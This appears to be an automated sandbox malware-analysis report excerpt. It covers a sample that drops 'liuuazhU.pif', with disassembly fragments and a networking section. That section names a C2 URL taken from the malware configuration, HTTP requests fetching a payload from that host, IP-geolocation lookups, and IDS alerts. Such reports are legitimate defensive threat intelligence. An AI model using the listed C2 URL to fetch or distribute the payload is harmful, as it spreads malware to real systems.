            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42CEECh11_2_2E42CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42BFDAh11_2_2E42BF2A
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42BFDAh11_2_2E42BF30
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42ABEDh11_2_2E42A850
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42EBACh11_2_2E42E810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42A05Dh11_2_2E429CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42E02Ch11_2_2E42DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E42D4ACh11_2_2E42D110
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CE590h11_2_2E4CE388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CF084h11_2_2E4CE388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C57BCh11_2_2E4C5420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C9E04h11_2_2E4C9A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C51FCh11_2_2E4C4E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CD1C4h11_2_2E4CCE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C85BCh11_2_2E4C8220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_2E4CD698
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CC644h11_2_2E4CC2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C7A3Ch11_2_2E4C76A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C9707h11_2_2E4C9360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CBAC4h11_2_2E4CB728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C6EBCh11_2_2E4C6B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C8B7Ch11_2_2E4C87E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CAF44h11_2_2E4CABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C633Ch11_2_2E4C5FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CCC04h11_2_2E4CC868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C7FFCh11_2_2E4C7C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CA3C4h11_2_2E4CA028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CC084h11_2_2E4CBCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C747Ch11_2_2E4C70E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C4C3Ch11_2_2E4C48A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CB504h11_2_2E4CB168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C68FCh11_2_2E4C6560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4CA984h11_2_2E4CA5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C5D7Ch11_2_2E4C59E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 2E4C913Ch11_2_2E4C8DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov esp, ebp11_2_2E7C2400
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]11_2_2E820400
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]11_2_2E820388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]11_2_2E8203F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h17_2_1C3CDD90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28B807h17_2_1F28B3E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28BFDAh17_2_1F28BF2B
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28BFDAh17_2_1F28BF30
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28CEECh17_2_1F28CB50
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28B1B5h17_2_1F28AE18
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28E5ECh17_2_1F28E250
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28A625h17_2_1F28A288
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F289A95h17_2_1F2896F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28DA6Ch17_2_1F28D6D0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28D4ACh17_2_1F28D110
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28EBACh17_2_1F28E810
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28ABEDh17_2_1F28A850
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28E02Ch17_2_1F28DC90
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F28A05Dh17_2_1F289CC0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1F29EF95h17_2_1F29EBF0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h17_2_1F29E7C0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1E590h17_2_1FE1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1F084h17_2_1FE1E388
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE18B7Ch17_2_1FE187E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1633Ch17_2_1FE15FA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1AF44h17_2_1FE1ABA8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE19707h17_2_1FE19360
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE16EBCh17_2_1FE16B20
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1BAC4h17_2_1FE1B728
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE17A3Ch17_2_1FE176A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1C644h17_2_1FE1C2A8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE151FCh17_2_1FE14E60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE19E04h17_2_1FE19A68
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE185BCh17_2_1FE18220
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1D1C4h17_2_1FE1CE28
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE15D7Ch17_2_1FE159E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1A984h17_2_1FE1A5E8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1913Ch17_2_1FE18DA0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE168FCh17_2_1FE16560
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1B504h17_2_1FE1B168
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1747Ch17_2_1FE170E0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1C084h17_2_1FE1BCE8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE14C3Ch17_2_1FE148A0
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE17FFCh17_2_1FE17C60
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1CC04h17_2_1FE1C868
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE157BCh17_2_1FE15420
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then jmp 1FE1A3C4h17_2_1FE1A028
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov esp, ebp17_2_20112400
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov esp, ebp17_2_20112488
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]17_2_202603F8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]17_2_202603C8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 4x nop then mov ecx, dword ptr [ebp-38h]17_2_20260400

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://www.volareconsultoria.com.br/245_Uhzauuilkul
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027EE7AC InternetCheckConnectionA,1_2_027EE7AC
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 50.116.86.44:443
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49732 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
            Source: global trafficHTTP traffic detected: GET /245_Uhzauuilkul HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.volareconsultoria.com.br
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49741 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49743 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /245_Uhzauuilkul HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: www.volareconsultoria.com.br
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: www.volareconsultoria.com.br
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D509000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D515000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADBA000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/h
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/p
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: x.exe, 00000001.00000002.1879596549.0000000021B30000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000001.00000003.1853089482.000000007F43A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1878974952.000000002173A000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1825875616.000000007F62F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.00000000204BF000.00000004.00001000.00020000.00000000.sdmp, liuuazhU.pif.1.drString found in binary or memory: http://ocsp.comodoca.com0$
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: x.exe, 00000001.00000002.1880103099.000000007F310000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000003.1826188514.000000007F620000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000001.00000002.1875750599.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Uhzauuil.PIF, 0000000A.00000002.2001207488.000000002057D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D531000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002ADD6000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C830000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D4A0000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
